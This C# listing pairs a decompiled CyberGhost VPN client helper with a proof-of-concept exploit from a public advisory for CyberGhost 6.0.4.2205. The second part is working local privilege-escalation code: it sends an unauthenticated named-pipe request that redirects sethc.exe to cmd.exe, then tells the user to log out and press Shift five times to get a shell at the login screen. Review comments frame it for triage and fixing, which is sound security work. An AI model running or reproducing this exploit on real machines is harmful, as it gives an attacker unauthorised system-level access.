/// <summary>
/// Vendor client helper (decompiled): sends a PE-launcher state change for the
/// first entry of <paramref name="aProcessList"/>, starts that process, and
/// records the options object so the launcher state can be restored later.
/// </summary>
/// <param name="aProcessList">Processes to start; only the first entry is used.</param>
/// <remarks>
/// This is the legitimate caller of <c>SetPeLauncherState</c>. The request is
/// built entirely on the client side, so any restriction on which executable
/// names or launcher paths are acceptable has to be enforced by whatever
/// receives the request.
/// NOTE(review): the receiving service is not shown here; confirm what it
/// validates and who is allowed to connect.
/// </remarks>
public static void StartProcessListAndDisableDebugger(List<ProcessStartInfo> aProcessList)
{
    // The listing calls MoveNext() exactly once, so only the first entry is
    // processed. That may be a decompiler artifact; it is reproduced as shown.
    foreach (ProcessStartInfo startInfo in aProcessList)
    {
        string exeName = Path.GetFileName(startInfo.FileName);
        startInfo.UseShellExecute = false;

        PeLauncherOptions launcherOptions = new PeLauncherOptions();
        launcherOptions.ExecuteableName = exeName;

        // 0 is the raw operation value as the decompiler printed it; which
        // PeLauncherOperation member it corresponds to is not visible here.
        ObjectHolder.CyberGhostCom.SetPeLauncherState(launcherOptions, 0);

        try
        {
            Process.Start(startInfo);
        }
        catch (Exception)
        {
            // Start failures are swallowed: the options are still queued below
            // even when the process never launched.
        }

        // The lazy initialisation happens outside the lock, so two threads can
        // both observe null here.
        if (ProcessHelpers._reenableLauncherOperations == null)
        {
            ProcessHelpers._reenableLauncherOperations = new List<PeLauncherOptions>();
        }

        lock (ProcessHelpers._reenableLauncherOperations)
        {
            ProcessHelpers._reenableLauncherOperations.Add(launcherOptions);
        }

        break;
    }
}
/// <summary>
/// Proof of concept from the advisory for CyberGhost 6.0.4.2205: an ordinary
/// local client opens the vendor's named pipe and submits the same
/// <c>SetPeLauncherState</c> request the vendor client uses, with caller-chosen
/// values for both the target executable name and the launcher path.
/// </summary>
/// <remarks>
/// The security-relevant point is the trust boundary: nothing in this client
/// authenticates to the pipe, so the request's acceptance depends entirely on
/// the receiving side.
/// NOTE(review): the service code is not shown. The vendor method name
/// ("...DisableDebugger") suggests a per-executable debugger/launcher
/// redirection such as Image File Execution Options; confirm before relying
/// on that.
/// For triage: an accessibility binary (here sethc.exe) mapped to a different
/// launcher is the artifact to look for, and the fix belongs in the service
/// (restrict pipe access and validate both fields).
/// </remarks>
static void Main(string[] args)
{
    Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
    Console.WriteLine("by Kacper Szurek");
    Console.WriteLine("http://security.szurek.pl/");
    Console.WriteLine("https://twitter.com/KacperSzurek");

    // Both fields are supplied by the caller without any constraint.
    PeLauncherOptions request = new PeLauncherOptions
    {
        ExecuteableName = "sethc.exe",
        PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe"
    };

    // Pipe name is reproduced exactly as the listing spells it.
    EventSender pipeClient = new EventSender("CyherGhostPipe");
    pipeClient.SetPeLauncherState(request, PeLauncherOperation.Add);

    Console.WriteLine("Now logout and then press SHIFT key 5 times");
}